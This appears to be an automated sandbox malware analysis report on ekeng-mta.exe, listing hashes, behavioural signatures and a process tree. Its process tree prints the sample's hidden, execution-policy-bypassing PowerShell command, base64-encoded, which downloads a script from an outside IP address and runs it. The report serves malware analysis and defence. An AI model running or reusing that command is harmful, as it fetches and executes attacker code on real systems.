Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
22-09-2023 05:10
Static task
static1
Behavioral task
behavioral1
Sample
ekeng-mta.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
ekeng-mta.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
mta.dll
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
mta.dll
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
mta.ps1
Resource
win7-20230831-en
General
-
Target
ekeng-mta.exe
-
Size
3.5MB
-
MD5
cbbad2e2170ee73c2bfdacdade718d29
-
SHA1
dcab4fafa0387c0b4f5b700763cea78afb092024
-
SHA256
3a679cb98f88d7d6bd84dcfe9717238c08c05942055bdb798103224e7f2f2ca9
-
SHA512
a4133f07ad8de23c82e164ee2bee32704efaf119cd4f1142145fca8688094b485317722db030e70fadeb8237a20dbded71f9340cafad8cdd982a1011da6fccca
-
SSDEEP
98304:R/YJIkkCBJroBdDv6Lj9uGQdT7Nx2Yn686n:R/0
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1936 wrote to memory of 1704 1936 ekeng-mta.exe 28 PID 1936 wrote to memory of 1704 1936 ekeng-mta.exe 28 PID 1936 wrote to memory of 1704 1936 ekeng-mta.exe 28 PID 1704 wrote to memory of 2696 1704 cmd.exe 30 PID 1704 wrote to memory of 2696 1704 cmd.exe 30 PID 1704 wrote to memory of 2696 1704 cmd.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\ekeng-mta.exe"C:\Users\Admin\AppData\Local\Temp\ekeng-mta.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-